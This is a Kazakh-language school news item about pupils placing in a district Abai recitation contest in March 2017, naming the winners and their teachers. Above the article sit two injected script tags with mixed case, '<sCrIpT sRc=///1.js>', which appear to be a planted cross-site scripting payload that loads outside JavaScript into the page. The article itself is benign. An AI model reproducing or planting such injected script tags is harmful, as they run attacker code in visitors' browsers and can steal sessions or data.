<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.04.2017

Аудандық «Абай оқулары» байқауы

2017-жылдың 30-наурызында Құдықағаш орта мектебінде аудандық «Абай оқулары»байқауы 

өтті. Байқау 3-кезеңнен тұрды. Біздің мектептен «Өлең-сөздің патшасы, сөз сарасы» кезеңі бойынша 7-сынып оқушысы Стаматова Виктория Абайдың «Ескендір» поэмасымен қатысып, жүлделі 1-орынға ие болды. Жетекшісі-Абжанова Мансия Сабикеновна. «Көңілім әнді ұғады» кезеңіне 5-сынып оқушысы Абжанова Махаббат қатысып,

жүлделі 3-орынға ие болды. Жетекшісі- Еркибаева Нұрсұлу Олжабаевна. «Жүйріктен жүйрік озар» кезеңі бойынша 6-сынып оқушысы Жасантегі Раббия қатысты. Жетекшісі- Жамалиева Айсұлу Өмірзаққызы. Жүлделі орындарға ие болған оқушыларымызды жеңістерімен құттықтай отыра, Викторияға сайыстың облыстық кезеңінде Еңбекшілдер

ауданының намысын қорғап , жеңіспен оралуына тілектеспіз.

 

Оқу ісінің меңгерушісі   Абжанова М.С.

Просмотров: 687


Пікір қосу



Деректерді қолтаңбаға қосу